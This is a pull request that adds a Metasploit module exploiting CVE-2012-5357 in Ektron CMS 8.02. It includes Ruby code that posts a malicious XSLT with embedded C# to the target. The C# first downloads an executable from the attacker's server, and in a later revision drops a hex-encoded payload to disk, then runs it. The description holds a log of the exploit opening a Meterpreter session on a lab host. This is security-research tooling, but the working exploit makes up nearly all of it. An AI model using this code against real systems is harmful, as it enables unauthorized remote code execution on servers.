### PR TITLE
Added module for CVE-2012-5357

### DIFF
--- a/modules/exploits/windows/http/ektron_xslt_exec.rb
+++ b/modules/exploits/windows/http/ektron_xslt_exec.rb
@@ -1,0 +1,285 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/exploit/file_dropper'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::EXE
+	include Msf::Exploit::FileDropper
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Ektron 8.02 XSLT Transform Remote Code Execution',
+			'Description'    => %q{
+					This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The
+				vulnerability exists due to the insecure usage of XslCompiledTransform, using a
+				XSLT controlled by the user. The module has been tested successfully on Ektron CMS
+				8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK
+				SERVICE privileges.
+			},
+			'Author'         => [
+				'Unknown', # Vulnerability discovery, http://webstersprodigy.net/ ?
+				'juan vazquez' # Metasploit module
+			],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2012-5357'],
+					[ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],
+					[ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]
+				],
+			'Payload'        =>
+				{
+					'Space'           => 2048,
+					'StackAdjustment' => -3500
+				},
+			'Platform'       => 'win',
+			'Privileged'     => true,
+			'Targets'        =>
+				[
+					['Windows 2003 SP2 / Ektron CMS400 8.02', { }],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Oct 16 2012'
+		))
+
+		register_options(
+			[
+				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
+				OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])
+			], self.class )
+	end
+
+	def check
+
+		fingerprint = rand_text_alpha(5 + rand(5))
+		xslt_data = <<-XSLT
+<?xml version='1.0'?>
+<xsl:stylesheet version="1.0"
+xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+xmlns:msxsl="urn:schemas-microsoft-com:xslt"
+xmlns:user="http://mycompany.com/mynamespace">
+<msxsl:script language="C#" implements-prefix="user">
+<![CDATA[
+public string xml()
+{
+return "#{fingerprint}";
+}
+]]>
+</msxsl:script>
+<xsl:template match="/">
+<xsl:value-of select="user:xml()"/>
+</xsl:template>
+</xsl:stylesheet>
+		XSLT
+
+		res = send_request_cgi(
+			{
+				'uri'     => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
+				'version' => '1.1',
+				'method'  => 'POST',
+				'ctype'   => "application/x-www-form-urlencoded; charset=UTF-8",
+				'headers' => {
+					"Referer" => build_referer
+				},
+				'vars_post'    => {
+					"xml" => rand_text_alpha(5 + rand(5)),
+					"xslt" => xslt_data
+				}
+			})
+
+		if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
+			return Exploit::CheckCode::Vulnerable
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+
+	def on_new_session(session)
+		if session.type == "meterpreter"
+			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+		end
+
+		@dropped_files.delete_if do |file|
+			win_file = file.gsub("/", "\\\\")
+			if session.type == "meterpreter"
+				begin
+					windir = session.fs.file.expand_path("%WINDIR%")
+					win_file = "#{windir}\\Temp\\#{win_file}"
+					# Meterpreter should do this automatically as part of
+					# fs.file.rm().  Until that has been implemented, remove the
+					# read-only flag with a command.
+					session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
+					session.fs.file.rm(win_file)
+					print_good("Deleted #{file}")
+					true
+				rescue ::Rex::Post::Meterpreter::RequestError
+					print_error("Failed to delete #{win_file}")
+					false
+				end
+
+			end
+		end
+
+	end
+
+
+	# Handle incoming requests from the target
+	def on_request_uri(cli, request)
+
+		if (not @exe_data)
+			print_error("A request came in, but the EXE archive wasn't ready yet!")
+			return
+		end
+
+		if request.uri =~ /\.txt/
+			print_good("Sending the EXE payload to the target...")
+			send_response(cli, @exe_data)
+			@exe_sent = true
+		else
+			# Don't know the request, return not found
+			print_error("Don't care about this file, 404")
+			send_not_found(cli)
+		end
+
+	end
+
+	def lookup_lhost()
+		# Get the source address
+		if datastore['SRVHOST'] == '0.0.0.0'
+			Rex::Socket.source_address('50.50.50.50')
+		else
+			datastore['SRVHOST']
+		end
+	end
+
+	def uri_path
+		uri_path = target_uri.path
+		uri_path << "/" if uri_path[-1, 1] != "/"
+		uri_path
+	end
+
+	def build_referer
+		if datastore['SSL']
+			schema = "https://"
+		else
+			schema = "http://"
+		end
+
+		referer = schema
+		referer << rhost
+		referer << ":#{rport}"
+		referer << uri_path
+		referer
+	end
+
+	def exploit
+		print_status("Generating the EXE Payload...")
+		@exe_data = generate_payload_exe
+		exename = rand_text_alpha(5 + rand(5))
+		resource_exe_uri = '/' + exename + '.txt'
+		service_exe = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_exe_uri}"
+
+		print_status("Generating the XSLT...")
+		fingerprint = rand_text_alpha(5 + rand(5))
+		payload_filename = rand_text_alpha(5 + rand(5))
+		xslt_data = <<-XSLT
+<?xml version='1.0'?>
+<xsl:stylesheet version="1.0"
+xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+xmlns:msxsl="urn:schemas-microsoft-com:xslt"
+xmlns:user="http://mycompany.com/mynamespace">
+<msxsl:script language="C#" implements-prefix="user">
+<![CDATA[
+public string xml()
+{
+System.Net.WebClient client = new System.Net.WebClient();
+client.DownloadFile(@"#{service_exe}", @"C:\\windows\\TEMP\\#{payload_filename}.txt");
+System.Diagnostics.Process p = new System.Diagnostics.Process();
+p.StartInfo.UseShellExecute = false;
+p.StartInfo.RedirectStandardOutput = true;
+p.StartInfo.FileName = @"C:\\windows\\TEMP\\#{payload_filename}.txt";
+p.Start();
+return "#{fingerprint}";
+}
+]]>
+</msxsl:script>
+<xsl:template match="/">
+<xsl:value-of select="user:xml()"/>
+</xsl:template>
+</xsl:stylesheet>
+		XSLT
+		register_file_for_cleanup("#{payload_filename}.txt")
+
+		print_status("Setting up the Web Service...")
+
+		ssl_option = nil
+		if datastore['SSL']
+			ssl_option = datastore['SSL']
+			datastore['SSL'] = false
+		end
+
+		print_status("Starting up our web service on #{service_exe} ...")
+		start_service({'Uri' => {
+			'Proc' => Proc.new { |cli, req|
+				on_request_uri(cli, req)
+			},
+			'Path' => resource_exe_uri
+		}})
+
+		if ssl_option
+			datastore['SSL'] = ssl_option
+		end
+
+		print_status("Trying to run the xslt transformation...")
+
+		res = send_request_cgi(
+			{
+				'uri'     => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
+				'version' => '1.1',
+				'method'  => 'POST',
+				'ctype'   => "application/x-www-form-urlencoded; charset=UTF-8",
+				'headers' => {
+					"Referer" => build_referer
+				},
+				'vars_post'    => {
+					"xml" => rand_text_alpha(5 + rand(5)),
+					"xslt" => xslt_data
+				},
+			})
+
+		if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
+			print_good("Exploitation was successful")
+		else
+			fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")
+		end
+
+		# wait for the data to be sent
+		print_status("Waiting for the victim to request the EXE payload...")
+
+		waited = 0
+		while (not @exe_sent)
+			select(nil, nil, nil, 1)
+			waited += 1
+			if (waited > datastore['HTTP_DELAY'])
+				fail_with(Exploit::Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
+			end
+		end
+
+		print_status("Giving time to the payload to execute...")
+		select(nil, nil, nil, 20)
+
+		print_status("Shutting down the web service...")
+		stop_service
+
+	end
+end

--- a/modules/exploits/windows/http/ektron_xslt_exec.rb
+++ b/modules/exploits/windows/http/ektron_xslt_exec.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				SERVICE privileges.
 			},
 			'Author'         => [
-				'Unknown', # Vulnerability discovery, http://webstersprodigy.net/ ?
+				'Unknown', # Vulnerability discovery, maybe Richard Lundeen from http://webstersprodigy.net/ ?
 				'juan vazquez' # Metasploit module
 			],
 			'License'        => MSF_LICENSE,
@@ -97,7 +97,7 @@ return "#{fingerprint}";
 				}
 			})
 
-		if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
+		if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body ! /Error/
 			return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe

--- a/modules/exploits/windows/http/ektron_xslt_exec.rb
+++ b/modules/exploits/windows/http/ektron_xslt_exec.rb
@@ -11,7 +11,6 @@ require 'msf/core/exploit/file_dropper'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
-	include Msf::Exploit::Remote::HttpServer
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::EXE
 	include Msf::Exploit::FileDropper
@@ -132,36 +131,6 @@ return "#{fingerprint}";
 
 	end
 
-
-	# Handle incoming requests from the target
-	def on_request_uri(cli, request)
-
-		if (not @exe_data)
-			print_error("A request came in, but the EXE archive wasn't ready yet!")
-			return
-		end
-
-		if request.uri =~ /\.txt/
-			print_good("Sending the EXE payload to the target...")
-			send_response(cli, @exe_data)
-			@exe_sent = true
-		else
-			# Don't know the request, return not found
-			print_error("Don't care about this file, 404")
-			send_not_found(cli)
-		end
-
-	end
-
-	def lookup_lhost()
-		# Get the source address
-		if datastore['SRVHOST'] == '0.0.0.0'
-			Rex::Socket.source_address('50.50.50.50')
-		else
-			datastore['SRVHOST']
-		end
-	end
-
 	def uri_path
 		uri_path = target_uri.path
 		uri_path << "/" if uri_path[-1, 1] != "/"
@@ -183,15 +152,12 @@ return "#{fingerprint}";
 	end
 
 	def exploit
-		print_status("Generating the EXE Payload...")
-		@exe_data = generate_payload_exe
-		exename = rand_text_alpha(5 + rand(5))
-		resource_exe_uri = '/' + exename + '.txt'
-		service_exe = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_exe_uri}"
 
-		print_status("Generating the XSLT...")
+		print_status("Generating the EXE Payload and the XSLT...")
+		exe_data = generate_payload_exe
+		exe_string = Rex::Text.to_hex(exe_data)
+		exename = rand_text_alpha(5 + rand(5))
 		fingerprint = rand_text_alpha(5 + rand(5))
-		payload_filename = rand_text_alpha(5 + rand(5))
 		xslt_data = <<-XSLT
 <?xml version='1.0'?>
 <xsl:stylesheet version="1.0"
@@ -202,12 +168,20 @@ xmlns:user="http://mycompany.com/mynamespace">
 <![CDATA[
 public string xml()
 {
-System.Net.WebClient client = new System.Net.WebClient();
-client.DownloadFile(@"#{service_exe}", @"C:\\windows\\TEMP\\#{payload_filename}.txt");
+char[] charData = "#{exe_string}".ToCharArray();
+string fileName = @"C:\\windows\\temp\\#{exename}.txt";
+System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create);
+System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs);
+for (int i = 0; i < charData.Length; i++)
+{
+	bw.Write( (byte) charData[i]);
+}
+bw.Close();
+fs.Close();
 System.Diagnostics.Process p = new System.Diagnostics.Process();
 p.StartInfo.UseShellExecute = false;
 p.StartInfo.RedirectStandardOutput = true;
-p.StartInfo.FileName = @"C:\\windows\\TEMP\\#{payload_filename}.txt";
+p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt";
 p.Start();
 return "#{fingerprint}";
 }
@@ -218,30 +192,8 @@ return "#{fingerprint}";
 </xsl:template>
 </xsl:stylesheet>
 		XSLT
-		register_file_for_cleanup("#{payload_filename}.txt")
-
-		print_status("Setting up the Web Service...")
-
-		ssl_option = nil
-		if datastore['SSL']
-			ssl_option = datastore['SSL']
-			datastore['SSL'] = false
-		end
-
-		print_status("Starting up our web service on #{service_exe} ...")
-		start_service({'Uri' => {
-			'Proc' => Proc.new { |cli, req|
-				on_request_uri(cli, req)
-			},
-			'Path' => resource_exe_uri
-		}})
-
-		if ssl_option
-			datastore['SSL'] = ssl_option
-		end
 
 		print_status("Trying to run the xslt transformation...")
-
 		res = send_request_cgi(
 			{
 				'uri'     => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
@@ -254,32 +206,14 @@ return "#{fingerprint}";
 				'vars_post'    => {
 					"xml" => rand_text_alpha(5 + rand(5)),
 					"xslt" => xslt_data
-				},
+				}
 			})
-
 		if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
 			print_good("Exploitation was successful")
+			register_file_for_cleanup("#{exename}.txt")
 		else
 			fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")
 		end
-
-		# wait for the data to be sent
-		print_status("Waiting for the victim to request the EXE payload...")
-
-		waited = 0
-		while (not @exe_sent)
-			select(nil, nil, nil, 1)
-			waited += 1
-			if (waited > datastore['HTTP_DELAY'])
-				fail_with(Exploit::Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
-			end
-		end
-
-		print_status("Giving time to the payload to execute...")
-		select(nil, nil, nil, 20)
-
-		print_status("Shutting down the web service...")
-		stop_service
 
 	end
 end

--- a/modules/exploits/windows/http/ektron_xslt_exec.rb
+++ b/modules/exploits/windows/http/ektron_xslt_exec.rb
@@ -97,7 +97,7 @@ return "#{fingerprint}";
 				}
 			})
 
-		if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body ! /Error/
+		if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
 			return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe


### PR DESCRIPTION
Tested on windows 2003 sp2 / Ektron CMS400 8.02

<pre>
msf  exploit(ektron_xslt_exec) > reload
[*] Reloading module...
msf  exploit(ektron_xslt_exec) > check
[+] The target is vulnerable.
msf  exploit(ektron_xslt_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.129:4444 
[*] Generating the EXE Payload...
msf  exploit(ektron_xslt_exec) > [*] Generating the XSLT...
[*] Setting up the Web Service...
[*] Starting up our web service on http://192.168.1.129:8080/zYaBZUOcD.txt ...
[*] Using URL: http://0.0.0.0:8080/zYaBZUOcD.txt
[*]  Local IP: http://192.168.1.129:8080/zYaBZUOcD.txt
[*] Trying to run the xslt transformation...
[+] Sending the EXE payload to the target...
[+] Exploitation was successful
[*] Waiting for the victim to request the EXE payload...
[*] Giving time to the payload to execute...
[*] Sending stage (752128 bytes) to 192.168.1.138
[*] Meterpreter session 1 opened (192.168.1.129:4444 -> 192.168.1.138:1080) at 2012-12-03 20:06:07 +0100
[-] Failed to delete C:\WINDOWS\Temp\bCwCD.txt
[*] Shutting down the web service...
[!] This exploit may require manual cleanup of: bCwCD.txt

msf  exploit(ektron_xslt_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.138 - Meterpreter session 1 closed.  Reason: User exit
msf  exploit(ektron_xslt_exec) > exit -y

</pre>
